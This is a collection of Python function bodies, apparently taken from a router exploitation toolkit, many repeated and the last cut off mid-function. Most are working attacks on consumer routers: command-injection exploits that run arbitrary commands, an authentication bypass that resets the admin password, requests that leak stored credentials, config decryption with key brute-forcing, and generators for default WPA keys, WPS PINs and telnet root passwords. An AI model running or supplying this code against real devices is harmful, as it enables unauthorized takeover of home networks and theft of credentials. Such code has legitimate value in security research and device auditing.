def do_run(self, e):
#httplib2.debuglevel = 1
user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
headers = {'User-Agent': user_agent,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3',
'Connection': 'keep-alive',
'Accept-Encoding': 'gzip, deflate',
'Cache-Control': 'no-cache',
'Cookie': 'C107373883=/omg1337hax'}
target = 'http://' + self.host + ":" + self.port + '/blabla'
h = httplib2.Http(timeout=60)
h.follow_all_redirects = True
try:
response, content = h.request(target, 'GET', headers=headers)
if response.status != 404:
print_failed("Unexpected HTTP status, expecting 404 got: %d" % response.status)
print_red("Device is not running RomPager")
else:
if 'server' in response.keys():
server = response.get('server')
if re.search('RomPager', server) is not None:
print_green("Got RomPager! Server:%s" % server)
if re.search('omg1337hax', content.decode()) is not None:
print_success("device is vulnerable to misfortune cookie")
else:
print_failed("test didn't pass.")
print_warning("Device MAY still be vulnerable")
else:
print_failed("RomPager not detected, device is running: %s " % server)
else:
print_failed("Not running RomPager")
except socket.timeout: # Is there a better way of handling timeout in httplib2?
print_error("Timeout!")
def do_run(self, e):
m = hashlib.md5()
m.update(
bytearray.fromhex(self.serial) + b'\x00' * 12 +
"kdf04rasdfKKduzA".encode('utf-8'))
code = m.hexdigest()
print_green("Reset code: " + code)
def do_run(self, e):
url = "http://%s:%s/login_handler.php" % (self.host, self.port)
headers = {
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'Accept-Language: en-us,en;q=0.5',
'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8'
}
data = 'reqMethod=json_cli_reqMethod" "json_cli_jsonData"; echo "741852'
try:
response = requests.post(url=url,
headers=headers,
data=data,
timeout=60)
if "741852" in response.text:
print_success("target is vulnerable")
# Not so sure about quoting of commands that has arguments
data = 'reqMethod=json_cli_reqMethod" "json_cli_jsonData"; %s' % self.command
response = requests.post(url=url,
headers=headers,
data=data,
timeout=60)
print_green(response.text)
elif "failure" in response.text:
print_error("Exploit failed, target is probably patched")
print_yellow(response.text)
except requests.Timeout:
print_error("exploit failed")
except requests.ConnectionError:
print_error("exploit failed")
def do_run(self, e):
user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
headers = {'User-Agent': user_agent,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3',
'Connection': 'keep-alive',
'Accept-Encoding': 'gzip, deflate',
'Cache-Control': 'no-cache',
'Cookie': 'C107373883=/omg1337hax'}
target = 'http://' + self.host + ":" + self.port + '/blabla'
try:
response = requests.get(target, headers=headers, timeout=60)
if response.status_code != 404:
print_failed("Unexpected HTTP status, expecting 404 got: %d" % response.status_code)
print_red("Device is not running RomPager")
else:
if 'server' in response.headers:
server = response.headers.get('server')
if re.search('RomPager', server) is not None:
print_green("Got RomPager! Server:%s" % server)
if re.search('omg1337hax', response.text) is not None:
print_success("device is vulnerable to misfortune cookie")
else:
print_failed("test didn't pass.")
print_warning("Device MAY still be vulnerable")
else:
print_failed("RomPager not detected, device is running: %s " % server)
else:
print_failed("Not running RomPager")
except requests.exceptions.Timeout:
print_error("Timeout!")
except requests.exceptions.ConnectionError:
print_error("No route to host")
def do_run(self, e):
url = "http://%s:%s/debug.cgi" % (self.host, self.port)
data = {"data1": "echo 741852", "command": "ui_debug"}
try:
response = requests.post(url=url,
data=data,
auth=("Gemtek", "gemtekswd"),
timeout=60)
result = re.findall(
"<textarea rows=30 cols=100>\\n(.*)\\n</textarea>",
response.text)
if "741852" == result[0]:
print_success("Target is vulnerable")
data = {"data1": self.command, "command": "ui_debug"}
response = requests.post(url=url,
data=data,
auth=("Gemtek", "gemtekswd"),
timeout=60)
result = re.findall(
"<textarea rows=30 cols=100>\\n(.*)\\n</textarea>",
response.text)
print_green(result[0])
else:
print_error("target is not vulnerable")
except requests.Timeout:
print_error("timeout")
except requests.ConnectionError:
print_error("exploit failed")
except TypeError:
print_error("Something went wrong in answer parsing")
def do_run(self, e):
url = "http://%s:%s/command.php" % (self.host, self.port)
payload = {'cmd': '%s; echo end' % self.command}
headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'Accept-Language: en-us,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8'
}
try:
print_yellow("Sending exploit")
# Requests forces URI encoding and can't be turned off
# so we have to prepare HTTP request manually and modify it with urllib.parse.quote before sending
request = requests.Request('POST', url, headers=headers, data=payload)
r = request.prepare()
# print("Before modification:", r.body)
r.body = urllib.parse.quote('cmd=%s; echo end' % self.command, safe='/=')
r.headers.update({'Content-Length': len(r.body)})
# print("After modification:", r.body)
s = requests.Session()
response = s.send(r, timeout=15)
s.close()
# This won't work
# response = requests.post(url, headers=headers, data=payload, proxies=proxies, timeout=60)
if "end" in response.text: # end8758 is unique tag to search for in output
print_success("output of %s:" % self.command)
print_green(response.text)
else:
print_error("could not find marker in response, exploit failed")
except requests.Timeout:
print_error("timeout")
except requests.ConnectionError:
print_error("exploit failed or you killed httpd")
def do_set(self, e):
args = e.split(' ')
if args[0] == "mac":
if validate_mac(args[1]):
self.mac = args[1]
print_green("MAC set to: " + self.mac + " " + lookup_mac(self.mac))
else:
print_error("please provide valid MAC address")
def do_set(self, e):
args = e.split(' ')
if args[0] == "mac":
if validate_mac(args[1]):
self.mac = args[1]
print_green("MAC set to: " + self.mac + " " + lookup_mac(self.mac))
else:
print_error("please provide valid MAC address")
def decompress_cfg(self, data):
"""Decompress a config file"""
modelstr = "V" + format(unpack(">H", self.get_modelid(data))[0], "04X")
print_green('Model is :\t' + modelstr)
rawcfgsize = 0x00100000
lzocfgsize = unpack(">L", data[0x24:0x28])[0]
raw = data[:0x2D] + b'\x00' + data[0x2E:0x100] + \
core.compression.lzo.pydelzo.decompress(b'\xF0' + pack(">L", rawcfgsize) + data[0x100:0x100 + lzocfgsize])
return raw
def decompress_cfg(self, data):
"""Decompress a config file"""
modelstr = "V" + format(unpack(">H", self.get_modelid(data))[0], "04X")
print_green('Model is :\t' + modelstr)
rawcfgsize = 0x00100000
lzocfgsize = unpack(">L", data[0x24:0x28])[0]
raw = data[:0x2D] + b'\x00' + data[0x2E:0x100] + \
core.compression.lzo.pydelzo.decompress(b'\xF0' + pack(">L", rawcfgsize) + data[0x100:0x100 + lzocfgsize])
return raw
def decompress_fs(self, data, path):
"""Decompress filesystem"""
lzofsdatalen = unpack('>L', data[4:8])[0]
print_green('Compressed FS length: %d [0x%08X]' % (lzofsdatalen, lzofsdatalen))
# stupid assumption of raw FS length. Seems OK for now
fsdatalen = 0x800000
fs_raw = core.compression.lzo.pydelzo.decompress(b'\xF0' + pack(">L", fsdatalen)
+ data[0x08:0x08 + lzofsdatalen])
cfs = fs(fs_raw)
return lzofsdatalen, cfs.save_all(path)
def brute_cfg(self, data):
"""Check all possible keys until data looks like decrypted"""
rdata = None
key = 0
for i in range(256):
rdata = self.decrypt(data, i)
if self.smart_guess(rdata) == self.CFG_LZO:
key = i
break
print_green('Found key:\t[0x%02X]' % key)
return rdata
def decompress_fs(self, data, path):
"""Decompress filesystem"""
lzofsdatalen = unpack('>L', data[4:8])[0]
print_green('Compressed FS length: %d [0x%08X]' %
(lzofsdatalen, lzofsdatalen))
# stupid assumption of raw FS length. Seems OK for now
fsdatalen = 0x800000
fs_raw = core.compression.lzo.pydelzo.decompress(
b'\xF0' + pack(">L", fsdatalen) + data[0x08:0x08 + lzofsdatalen])
cfs = fs(fs_raw)
return lzofsdatalen, cfs.save_all(path)
def decrypt_cfg(self, data):
"""Decrypt config, bruteforce if default key fails"""
modelstr = "V" + format(unpack(">H", self.get_modelid(data))[0], "04X")
print_green('Model is :\t' + modelstr)
ckey = self.make_key(modelstr)
rdata = self.decrypt(data[0x100:], ckey)
# if the decrypted data does not look good, bruteforce
if self.smart_guess(rdata) != self.CFG_LZO:
rdata = self.brute_cfg(data[0x100:])
print_green('Used key :\t[0x%02X]' % ckey)
return data[:0x2D] + b'\x01' + data[0x2E:0x100] + rdata
def brute_cfg(self, data):
"""Check all possible keys until data looks like decrypted"""
rdata = None
key = 0
for i in range(256):
rdata = self.decrypt(data, i)
if self.smart_guess(rdata) == self.CFG_LZO:
key = i
break
print_green('Found key:\t[0x%02X]' % key)
return rdata
def decrypt_cfg(self, data):
"""Decrypt config, bruteforce if default key fails"""
modelstr = "V" + format(unpack(">H", self.get_modelid(data))[0], "04X")
print_green('Model is :\t' + modelstr)
ckey = self.make_key(modelstr)
rdata = self.decrypt(data[0x100:], ckey)
# if the decrypted data does not look good, bruteforce
if self.smart_guess(rdata) != self.CFG_LZO:
rdata = self.brute_cfg(data[0x100:])
print_green('Used key :\t[0x%02X]' % ckey)
return data[:0x2D] + b'\x01' + data[0x2E:0x100] + rdata
def do_run(self, e):
f = open(self.input_file, 'rb')
data = f.read()
f.close()
g, outdata = self.de_cfg(data)
if g != self.CFG_RAW:
core.io.writefile(outdata, "config.out")
print_success("config file written to config.out, extracting credentials...")
creds = self.get_credentials(outdata)
print_green("Login :\t" + (creds[0] == b"" and b"admin" or creds[0]).decode())
print_green("Password :\t" + (creds[1] == b"" and b"admin" or creds[1]).decode())
def do_run(self, e):
url = "http://%s:%s/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0" % (
self.host, self.port)
try:
print_yellow("Sending exploit")
response = requests.get(url, timeout=60)
if response.status_code == 200 and 'name="admin_password1"' in response.text:
print_success("target seems vulnerable")
print_green(
"You can visit any page by adding ?NO_NEED_AUTH=1&AUTH_GROUP=0 to URL"
)
print_yellow("Changing admin password")
headers = {
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language':
'Accept-Language: en-us,en;q=0.5',
'Accept-Encoding':
'gzip, deflate',
'Content-Type':
'application/x-www-form-urlencoded;charset=utf-8'
}
payload = {
'NO_NEED_AUTH': 1,
'AUTH_GROUP': 0,
'ACTION_POST': 1,
'apply': 'Save+Settings',
'admin_name': 'admin',
'admin_password1': '%s' % self.password,
'admin_password2': '%s' % self.password,
'grap_auth_enable_h': 0,
'rt_ipaddr': '0.0.0.0'
}
url = "http://%s:%s/tools_admin.php" % (self.host, self.port)
response = requests.post(url=url,
headers=headers,
data=payload,
timeout=60)
if response.status_code == 200:
print_success(
"password seems to be changed try to login with: %s" %
self.password)
else:
print_error("password change failed")
else:
print_error("exploit failed")
except requests.Timeout:
print_error("timeout")
except requests.ConnectionError:
print_error("exploit failed")
def do_run(self, e):
mac = self.mac
mac = mac.upper()
mac = mac.replace("-", "")
mac = mac.replace(":", "")
fibnum = [0, 0, 0, 0, 0, 0]
fibsum = 0
seed = 16
count = 1
offset = 0
counter = 0
a = 0
macs = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
tmp = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
c = 0
while c < 12:
macs[a] = int(mac[c]+mac[c+1], 16)
tmp[a] = int(mac[c] + mac[c+1], 16)
a += 1
c += 2
for i in range(6):
if tmp[i] > 30:
while tmp[i] > 31:
tmp[i] -= 16
counter += 1
if counter == 0:
if tmp[i] < 3:
tmp[i] = tmp[0]+tmp[1]+tmp[2]+tmp[3]+tmp[4]+tmp[5]-tmp[i]
if tmp[i] > 0xff:
tmp[i] = tmp[i] and 0xff
tmp[i] = int(tmp[i] % 28) + 3
fibnum[i] = self.fib_gen(tmp[i])
else:
fibnum[i] = self.fib_gen(tmp[i]) + self.fib_gen(counter)
counter = 0
for i in range(6):
fibsum += (fibnum[i] * self.fib_gen(i+seed))+macs[i]
fibsum %= 10000000
checksum = self.compute_checksum(fibsum)
fibsum = (fibsum * 10) + checksum
print_success("")
print_green("WPS PIN: " + str(fibsum))
def do_run(self, e):
url = "http://%s:%s/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd" % (self.host, self.port)
try:
print_yellow("Sending exploit")
response = requests.get(url, timeout=60)
if response.status_code == 200 and "<center>" in response.text:
print_success("credentials fetched")
credentials = re.findall("<center>\n\t\t\t(.*)", response.text)
print_green(credentials[0])
except requests.Timeout:
print_error("timeout")
except requests.ConnectionError:
print_error("exploit failed")
def do_run(self, e):
f = open(self.input_file, 'rb')
data = f.read()
f.close()
g, outdata = self.de_cfg(data)
if g != self.CFG_RAW:
core.io.writefile(outdata, "config.out")
print_success(
"config file written to config.out, extracting credentials...")
creds = self.get_credentials(outdata)
print_green("Login :\t" +
(creds[0] == b"" and b"admin" or creds[0]).decode())
print_green("Password :\t" +
(creds[1] == b"" and b"admin" or creds[1]).decode())
def do_run(self, e):
mac = self.mac
mac = mac.upper()
mac = mac.replace("-", "")
mac = mac.replace(":", "")
const = int('D0EC31', 16)
inp = int(mac[6:], 16)
result = (inp - const)//4
ssid = "Discus--"+mac[6:]
key = "YW0" + str(result)
print_success("")
print_green("Possible SSID: " + ssid)
print_green("WPA Key: " + key)
def do_run(self, e):
mac = self.mac
mac = mac.upper()
mac = mac.replace("-", "")
mac = mac.replace(":", "")
const = int('D0EC31', 16)
inp = int(mac[6:], 16)
result = (inp - const)//4
ssid = "Discus--"+mac[6:]
key = "YW0" + str(result)
print_success("")
print_green("Possible SSID: " + ssid)
print_green("WPA Key: " + key)
def do_run(self, e):
mac_str = re.sub(r'[^a-fA-F0-9]', '', self.mac)
bytemac = bytearray.fromhex(mac_str)
print_success("")
print_green('based on rg_mac:\nSSID: PBS-%02X%02X%02X' % (bytemac[3], bytemac[4], bytemac[5]))
print_green('WPA key: %s\n' % (self.gen_key(bytemac)))
bytemac[5] -= 5
print_green('based on BSSID:\nSSID: PBS-%02X%02X%02X' % (bytemac[3], bytemac[4], bytemac[5]))
print_green('WPA key: %s\n' % (self.gen_key(bytemac)))
def do_run(self, e):
mac_str = re.sub(r'[^a-fA-F0-9]', '', self.mac)
bytemac = bytearray.fromhex(mac_str)
print_success("")
print_green('based on rg_mac:\nSSID: PBS-%02X%02X%02X' % (bytemac[3], bytemac[4], bytemac[5]))
print_green('WPA key: %s\n' % (self.gen_key(bytemac)))
bytemac[5] -= 5
print_green('based on BSSID:\nSSID: PBS-%02X%02X%02X' % (bytemac[3], bytemac[4], bytemac[5]))
print_green('WPA key: %s\n' % (self.gen_key(bytemac)))
def do_run(self, e):
mac = self.mac
mac = mac.replace(":", "")
mac = mac.replace("-", "")
c1 = str(int(mac[8:], 16))
while len(c1) < 5:
c1 = "0" + c1
s6 = int(c1[0], 16)
s7 = int(c1[1], 16)
s8 = int(c1[2], 16)
s9 = int(c1[3], 16)
s10 = int(c1[4], 16)
m7 = int(mac[6], 16)
m8 = int(mac[7], 16)
m9 = int(mac[8], 16)
m10 = int(mac[9], 16)
m11 = int(mac[10], 16)
m12 = int(mac[11], 16)
k1 = (s7 + s8 + m11 + m12) & 0x0F
k2 = (m9 + m10 + s9 + s10) & 0x0F
x1 = k1 ^ s10
x2 = k1 ^ s9
x3 = k1 ^ s8
y1 = k2 ^ m10
y2 = k2 ^ m11
y3 = k2 ^ m12
z1 = m11 ^ s10
z2 = m12 ^ s9
z3 = k1 ^ k2
ssid = "EasyBox-" + format(m7, 'x') + format(m8, 'x') + format(m9, 'x') \
+ format(m10, 'x') + format(s6, 'x') + format(s10, 'x')
wpakey = format(x1, 'x') + format(y1, 'x') + format(z1, 'x') + \
format(x2, 'x') + format(y2, 'x') + format(z2, 'x') + \
format(x3, 'x') + format(y3, 'x') + format(z3, 'x')
print_success("")
print_green("SSID:" + ssid)
print_green("WPA2KEY:" + wpakey.upper())
def do_run(self, e):
mac = self.mac
mac = mac.replace(":", "")
mac = mac.replace("-", "")
c1 = str(int(mac[8:], 16))
while len(c1) < 5:
c1 = "0" + c1
s6 = int(c1[0], 16)
s7 = int(c1[1], 16)
s8 = int(c1[2], 16)
s9 = int(c1[3], 16)
s10 = int(c1[4], 16)
m7 = int(mac[6], 16)
m8 = int(mac[7], 16)
m9 = int(mac[8], 16)
m10 = int(mac[9], 16)
m11 = int(mac[10], 16)
m12 = int(mac[11], 16)
k1 = (s7 + s8 + m11 + m12) & 0x0F
k2 = (m9 + m10 + s9 + s10) & 0x0F
x1 = k1 ^ s10
x2 = k1 ^ s9
x3 = k1 ^ s8
y1 = k2 ^ m10
y2 = k2 ^ m11
y3 = k2 ^ m12
z1 = m11 ^ s10
z2 = m12 ^ s9
z3 = k1 ^ k2
ssid = "EasyBox-" + format(m7, 'x') + format(m8, 'x') + format(m9, 'x') \
+ format(m10, 'x') + format(s6, 'x') + format(s10, 'x')
wpakey = format(x1, 'x') + format(y1, 'x') + format(z1, 'x') + \
format(x2, 'x') + format(y2, 'x') + format(z2, 'x') + \
format(x3, 'x') + format(y3, 'x') + format(z3, 'x')
print_success("")
print_green("SSID:" + ssid)
print_green("WPA2KEY:" + wpakey.upper())
def decompress_firmware(data):
"""Decompress firmware"""
flen = len(data)
sigstart = data.find(b'\xA5\xA5\xA5\x5A\xA5\x5A')
# Try an alternative signature
if sigstart <= 0:
sigstart = data.find(b'\x5A\x5A\xA5\x5A\xA5\x5A')
# Compressed FW block found, now decompress
if sigstart > 0:
print_green('Signature found at [0x%08X]' % sigstart)
lzosizestart = sigstart + 6
lzostart = lzosizestart + 4
lzosize = unpack('>L', bytes(data[lzosizestart:lzostart]))[0]
return data[0x100:sigstart + 2] + core.compression.lzo.pydelzo.decompress(
b'\xF0' + pack(">L", 0x1000000) + data[lzostart:lzostart + lzosize])
else:
print_error('Compressed FW signature not found!')
return None
def save_file(self, i):
"""Extract file #i from current FS"""
fname = self.get_fname(i)
# compressed file data offset in FS block
ds = self.get_offset(i)
# size of compressed file
fs = self.get_fsize(i)
# compressed file data
fdata = self.cdata[ds:ds + fs]
# create all subdirs along the path if they don't exist
pp = fname.split('\\')
pp = [self.path] + pp
ppp = os.sep.join(pp[:-1])
if len(pp) > 1:
if not os.path.exists(ppp):
os.makedirs(ppp)
nfname = os.sep.join(pp)
# size of uncompressed file
rawfs = -1
ff = open(nfname, 'wb')
# perform extraction, some file types are not compressed
if fs > 0:
if pp[-1].split('.')[-1].lower() in [
'gif', 'jpg', 'cgi', 'cab', 'txt', 'jar'
]:
rawfdata = fdata
else:
try:
rawfdata = core.compression.lzo.pydelzo.decompress(
b'\xF0' + pack(">L", fs * 64) + fdata)
except core.compression.lzo.LZO_ERROR as lze:
print_warning('File "' + fname +
'" is damaged or uncompressed [' + str(lze) +
'], RAW DATA WRITTEN')
rawfdata = fdata
else:
rawfdata = ''
rawfs = len(rawfdata)
ff.write(rawfdata)
ff.close()
# print some debug info for each file
print_green('%08X "' % ds + fname + '" %08X' % fs + ' %08X' % rawfs)
return fs, rawfs
def do_run(self, e):
url = "http://%s:%s/hidden_info.html" % (self.host, self.port)
try:
print_warning("Sending exploit")
response = requests.get(url, timeout=60)
if "Manufacture Information" in response.text:
print_success("information obtained, writing response into hidden_info.html")
core.io.writetextfile(response.text, "hidden_info.html")
print_warning("Please check file, response seems to depend on FW version, parsing may not be accurate")
value = re.findall("str =\(\"\[\{(.*)\}", response.text)
value = value[0].split(',')
for i in value:
print_green(i)
else:
print_error("exploit failed")
except requests.Timeout:
print_error("timeout")
except requests.ConnectionError:
print_error("exploit failed")
def do_run(self, e):
mac = self.mac
mac = mac.upper()
mac = mac.replace("-", "")
mac = mac.replace(":", "")
mac = mac[6:]
p = int(mac, 16) % 10000000
pin = p
accum = 0
while pin:
accum += int(3 * (pin % 10))
pin = int(pin / 10)
accum += int(pin % 10)
pin = int(pin / 10)
key = (10 - accum % 10) % 10
key = format("%07d%d" % (p, key))
print_success("")
print_green("WPS pin:" + key)
def decompress_firmware(data):
"""Decompress firmware"""
flen = len(data)
sigstart = data.find(b'\xA5\xA5\xA5\x5A\xA5\x5A')
# Try an alternative signature
if sigstart <= 0:
sigstart = data.find(b'\x5A\x5A\xA5\x5A\xA5\x5A')
# Compressed FW block found, now decompress
if sigstart > 0:
print_green('Signature found at [0x%08X]' % sigstart)
lzosizestart = sigstart + 6
lzostart = lzosizestart + 4
lzosize = unpack('>L', bytes(data[lzosizestart:lzostart]))[0]
return data[0x100:sigstart +
2] + core.compression.lzo.pydelzo.decompress(
b'\xF0' + pack(">L", 0x1000000) +
data[lzostart:lzostart + lzosize])
else:
print_error('Compressed FW signature not found!')
return None
def do_run(self, e):
mac = self.mac
mac = mac.upper()
mac = mac.replace("-", "")
mac = mac.replace(":", "")
mac = mac[6:]
p = int(mac, 16) % 10000000
pin = p
accum = 0
while pin:
accum += int(3 * (pin % 10))
pin = int(pin / 10)
accum += int(pin % 10)
pin = int(pin / 10)
key = (10 - accum % 10) % 10
key = format("%07d%d" % (p, key))
print_success("")
print_green("WPS pin:" + key)
def do_run(self, e):
mac = self.mac
mac = mac.upper()
mac = mac.replace("-", "")
mac = mac.replace(":", "")
password = [c for c in "00000000"]
mac = [c.lower() for c in mac]
password[0] = self.mash(mac[5], mac[11])
password[1] = self.mash(mac[0], mac[2])
password[2] = self.mash(mac[10], mac[11])
password[3] = self.mash(mac[0], mac[9])
password[4] = self.mash(mac[10], mac[6])
password[5] = self.mash(mac[3], mac[9])
password[6] = self.mash(mac[1], mac[6])
password[7] = self.mash(mac[3], mac[4])
password = "".join(p for p in password)
print_success("")
print_green("Telnet password for root is: " + password)
def do_run(self, e):
mac_array = self.mac.split(":")
counter = 0
for i in mac_array:
mac_array[counter] = int(i, 16)
counter += 1
counter = 0
while counter < 5:
char = mac_array[counter] + mac_array[counter+1]
self.printchar(char)
counter += 1
counter = 0
while counter < 3:
char = mac_array[counter] + mac_array[counter+1] + 0xF
self.printchar(char)
counter += 1
print_success('')
print_green("Username: __super")
print_green("Password: " + self.password)
def do_run(self, e):
mac = self.mac
mac = mac.upper()
mac = mac.replace("-", "")
mac = mac.replace(":", "")
password = [c for c in "00000000"]
mac = [c.lower() for c in mac]
password[0] = self.mash(mac[5], mac[11])
password[1] = self.mash(mac[0], mac[2])
password[2] = self.mash(mac[10], mac[11])
password[3] = self.mash(mac[0], mac[9])
password[4] = self.mash(mac[10], mac[6])
password[5] = self.mash(mac[3], mac[9])
password[6] = self.mash(mac[1], mac[6])
password[7] = self.mash(mac[3], mac[4])
password = "".join(p for p in password)
print_success("")
print_green("Telnet password for root is: " + password)
def do_run(self, e):
mac_array = self.mac.split(":")
counter = 0
for i in mac_array:
mac_array[counter] = int(i, 16)
counter += 1
counter = 0
while counter < 5:
char = mac_array[counter] + mac_array[counter + 1]
self.printchar(char)
counter += 1
counter = 0
while counter < 3:
char = mac_array[counter] + mac_array[counter + 1] + 0xF
self.printchar(char)
counter += 1
print_success('')
print_green("Username: __super")
print_green("Password: " + self.password)
def do_run(self, e):
url = "http://%s:%s/command.php" % (self.host, self.port)
payload = {'cmd': '%s; echo end' % self.command}
headers = {
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'Accept-Language: en-us,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8'
}
try:
print_yellow("Sending exploit")
# Requests forces URI encoding and can't be turned off
# so we have to prepare HTTP request manually and modify it with urllib.parse.quote before sending
request = requests.Request('POST',
url,
headers=headers,
data=payload)
r = request.prepare()
# print("Before modification:", r.body)
r.body = urllib.parse.quote('cmd=%s; echo end' % self.command,
safe='/=')
r.headers.update({'Content-Length': len(r.body)})
# print("After modification:", r.body)
s = requests.Session()
response = s.send(r, timeout=15)
s.close()
# This won't work
# response = requests.post(url, headers=headers, data=payload, proxies=proxies, timeout=60)
if "end" in response.text: # end8758 is unique tag to search for in output
print_success("output of %s:" % self.command)
print_green(response.text)
else:
print_error(
"could not find marker in response, exploit failed")
except requests.Timeout:
print_error("timeout")
except requests.ConnectionError:
print_error("exploit failed or you killed httpd")
def save_file(self, i):
"""Extract file #i from current FS"""
fname = self.get_fname(i)
# compressed file data offset in FS block
ds = self.get_offset(i)
# size of compressed file
fs = self.get_fsize(i)
# compressed file data
fdata = self.cdata[ds: ds + fs]
# create all subdirs along the path if they don't exist
pp = fname.split('\\')
pp = [self.path] + pp
ppp = os.sep.join(pp[:-1])
if len(pp) > 1:
if not os.path.exists(ppp):
os.makedirs(ppp)
nfname = os.sep.join(pp)
# size of uncompressed file
rawfs = -1
ff = open(nfname, 'wb')
# perform extraction, some file types are not compressed
if fs > 0:
if pp[-1].split('.')[-1].lower() in ['gif', 'jpg', 'cgi', 'cab', 'txt', 'jar']:
rawfdata = fdata
else:
try:
rawfdata = core.compression.lzo.pydelzo.decompress(b'\xF0' + pack(">L", fs * 64) + fdata)
except core.compression.lzo.LZO_ERROR as lze:
print_warning('File "' + fname + '" is damaged or uncompressed ['
+ str(lze)
+ '], RAW DATA WRITTEN')
rawfdata = fdata
else:
rawfdata = ''
rawfs = len(rawfdata)
ff.write(rawfdata)
ff.close()
# print some debug info for each file
print_green('%08X "' % ds + fname + '" %08X' % fs + ' %08X' % rawfs)
return fs, rawfs
def do_run(self, e):
file = ""
for file in self.files:
print_yellow("Testing file: " + file)
url = "http://%s:%s/%s?writeData=true®info=0&macAddress= 001122334455 -c 0 ;" \
"%s; echo #" % (self.host, self.port, file, "sleep 10")
try:
print_yellow("Doing timebased check with sleep 10")
time_start = datetime.datetime.now()
response = requests.get(url=url, timeout=60)
time_end = datetime.datetime.now()
delta = time_end - time_start
if response.status_code == 200 and "Update Success!" in response.text:
if 13 > delta.seconds > 9:
print_green(
"Timebased check OK target should be vulnerable")
else:
print_yellow(
"Timebased check failed, but target still might be vulnerable"
)
break
except requests.Timeout:
print_error("timeout")
except requests.ConnectionError:
print_error("exploit failed")
print_green("Vulnerable file:" + file)
print_yellow("Sending command")
url = "http://%s:%s/%s?writeData=true®info=0&macAddress= 001122334455 -c 0 ;" \
"%s; echo #" % (self.host, self.port, file, self.command)
try:
response = requests.get(url=url, timeout=60)
if response.status_code == 200 and "Update Success!" in response.text:
print_success("command sent")
except requests.Timeout:
print_error("timeout")
except requests.ConnectionError:
print_error(
"target stopped responding or you issued reboot or killed lighttpd"
)
def do_run(self, e):
url = "http://%s:%s/getcfg.php" % (self.host, self.port)
payload = {'SERVICES': 'DEVICE.ACCOUNT'}
headers = {
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'Accept-Language: en-us,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8'
}
try:
print_yellow("Sending exploit")
response = requests.post(url,
headers=headers,
data=payload,
timeout=60)
if "<service>DEVICE.ACCOUNT</service>" in response.text:
usernames = re.findall("<name>(.*)</name>", response.text)
passwords = re.findall("<password>(.*)</password>",
response.text)
if "==OoXxGgYy==" in passwords:
print_error(
"Exploit failed, router responded with default value ==OoXxGgYy=="
)
else:
print_success("")
for i in range(len(usernames)):
print_green("Username: "******"Password: "******"Exploit failed")
except requests.Timeout:
print_error("timeout")
except requests.ConnectionError:
print_error("exploit failed")
def do_run(self, e):
url = "http://%s:%s/hidden_info.html" % (self.host, self.port)
try:
print_warning("Sending exploit")
response = requests.get(url, timeout=60)
if "Manufacture Information" in response.text:
print_success(
"information obtained, writing response into hidden_info.html"
)
core.io.writetextfile(response.text, "hidden_info.html")
print_warning(
"Please check file, response seems to depend on FW version, parsing may not be accurate"
)
value = re.findall("str =\(\"\[\{(.*)\}", response.text)
value = value[0].split(',')
for i in value:
print_green(i)
else:
print_error("exploit failed")
except requests.Timeout:
print_error("timeout")
except requests.ConnectionError:
print_error("exploit failed")
def do_run(self, e):
mac = self.mac
mac = mac.upper()
mac = mac.replace("-", "")
mac = mac.replace(":", "")
ssid = "Sitecom%s" % mac[6:].upper()
wpa_4000 = self.generate_key(mac, "4000")
wpa_4004 = self.generate_key(mac, "4004")
print_success("")
print_green("SSID:" + ssid)
print_green("WPA Key for model WLR-4000: " + wpa_4000)
print_green("WPA Key for model WLR-4004: " + wpa_4004)
def do_run(self, e):
mac = self.mac
mac = mac.upper()
mac = mac.replace("-", "")
mac = mac.replace(":", "")
ssid = "Sitecom%s" % mac[6:].upper()
wpa_4000 = self.generate_key(mac, "4000")
wpa_4004 = self.generate_key(mac, "4004")
print_success("")
print_green("SSID:" + ssid)
print_green("WPA Key for model WLR-4000: " + wpa_4000)
print_green("WPA Key for model WLR-4004: " + wpa_4004)
def do_run(self, e):
if self.ssl is False:
url = "http://%s:%s" % (self.host, self.port)
else:
url = "https://%s:%s" % (self.host, self.port)
try:
print_yellow("Sending GET request")
response = requests.get(url, timeout=60, verify=False)
print_green("[%s %s] %s" % (response.status_code, response.reason, response.url))
for header in response.headers:
print_green("%s: %s" % (header, response.headers.get(header)))
if self.body is True:
print("\n")
print_green(response.text)
except requests.ConnectionError as e:
print_error("connection error %s" % e)
except requests.Timeout:
print_error("timeout")
def do_run(self, e):
if self.ssl is False:
url = "http://%s:%s" % (self.host, self.port)
else:
url = "https://%s:%s" % (self.host, self.port)
try:
print_yellow("Sending GET request")
response = requests.get(url, timeout=60, verify=False)
print_green("[%s %s] %s" % (response.status_code, response.reason, response.url))
for header in response.headers:
print_green("%s: %s" % (header, response.headers.get(header)))
if self.body is True:
print("\n")
print_green(response.text)
except requests.ConnectionError as e:
print_error("connection error %s" % e)
except requests.Timeout:
print_error("timeout")
def do_run(self, e):
mac = self.mac
mac = mac.replace(":", "")
mac = mac.replace("-", "")
mac_array = [0]*12
i = 0
for number in mac:
mac_array[i] = int(number, 16)
i += 1
